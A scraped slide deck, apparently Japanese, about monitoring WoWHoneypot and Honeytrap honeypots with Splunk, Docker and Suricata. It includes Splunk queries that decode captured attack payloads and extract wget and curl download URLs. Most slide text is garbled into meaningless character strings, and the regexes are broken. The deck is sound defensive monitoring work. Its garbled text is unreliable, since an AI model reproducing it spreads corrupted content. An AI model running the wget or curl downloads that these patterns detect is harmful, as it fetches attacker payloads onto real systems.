Splunkによるハニーポット監視.pdf
by
sec-chick
Link
Embed
Share
Beginning
This slide
Copy link URL
Copy link URL
Copy iframe embed code
Copy iframe embed code
Copy javascript embed code
Copy javascript embed code
Share
Tweet
Share
Tweet
Slide 1
Slide 1 text
5 SPLUNK SEC-CHICK
Slide 2
Slide 2 text
WHO AM I • sec-chick@one_sec_chick (('/+#!/) • )/ ,-$ PSOC&-% • 2 ('/+#% (WoW Honeypot, Honeytrap) 0".*/1
Slide 3
Slide 3 text
Slide 4
Slide 4 text
Splunk ( ) WoWHoneypot Honeytrap PC VPS SSH • Splunk
Slide 5
Slide 5 text
SPLUNK • Splunk<(159$= 16%;'49&;/ .+-8;$,;*!9,+$()0-"# • IT!905!29-6 7*!3 : > http://www.intellilink.co.jp/pd/products/package/security/splunk.html
Slide 6
Slide 6 text
• WoWHoneypot
Slide 7
Slide 7 text
• Honeytrap
Slide 8
Slide 8 text
8 9 1. SSH)71!&+*57%45' ,#6570 2. Splunk)71,#65705' 3. Splunk5' )7- 4. 37/ 5. 2"570 .(70 82"570HEX$6(709
Slide 9
Slide 9 text
Attack_connection.local_port 10
Slide 10
Slide 10 text
Attack_connection.payload.data_hex Hex →
Slide 11
Slide 11 text
Slide 12
Slide 12 text
1. Docker 2. 3. Splunk 4. Suricata
Slide 13
Slide 13 text
/.10,-%DOCKER • /.10,-&$ $!"'* (#) + $* (Docker+ • $ Docker+→% $
Slide 14
Slide 14 text
%"-+( • .#Docker %"-+( • %"-+(cron$,* Splunk WoWHoneypot Honeytrap !/&0)'( VPS Honeypot.# Docker
Slide 15
Slide 15 text
Splunk WoWHoneypot Honeytrap VPS Honeypot Docker
Slide 16
Slide 16 text
SPLUNK+;N? • 0 '!0.*Splunk+;N?1 • @:NB+2EJ9N5MLNB1%$URL1D3NKB("& → HK562+>5MLNB1VirusTotal'
Slide 17
Slide 17 text
WOWHONEYPOT |rex field=_raw "¥"(?[^¥s]+)¥s(?[^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s([^¥s]+)¥s(? .*$)" | decrypt field="base64_wow" atob emit('base64_wow_decrypted’) |eval decode=urldecode(base64_wow_decrypted) | rex field="decode" "wget.+(?https?://[¥w/:¥.¥-]+?)¥s"| rex field="decode" "curl.+(?https?://[¥w/:¥.¥-]+?)¥s"
Slide 18
Slide 18 text
HONEYTRAP | decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted') | rex field="attack_connection.payload.data_decrypted" "wget.+(?https?://[¥w/:¥.¥-]+?)¥s" | rex field="attack_connection.payload.data_decrypted" "curl.+(?https?://[¥w/:¥.¥-]+?)¥s" |
Slide 19
Slide 19 text
HONEYTRAP
Slide 20
Slide 20 text
SURICATA4 • Grep05%72# 9),#1# • ;=:><05"68+* 525 /#2# → ./ • Suricata3)#),7 !1$/'-(#??
Slide 21
Slide 21 text
"!-,1.)(1 • @Sec_S_Owl # • @cactus_pots # • @SugitaMuchi # • @soji256 • @morihi_soc # -,1.)+ !Twitter-)'0(% #-,1.)+ Slack!&/0,*$ ! 2 http://goo.gl/8bLkZA
Slide 22
Slide 22 text
#
Slide 23
Slide 23 text
/)0 • Splunk(,A@CB>?, +&' • (5)"6-*5. $2%4+;C= 7$ +7!54+%5") • #81A@CB>?7$'7<:9$'/$3DD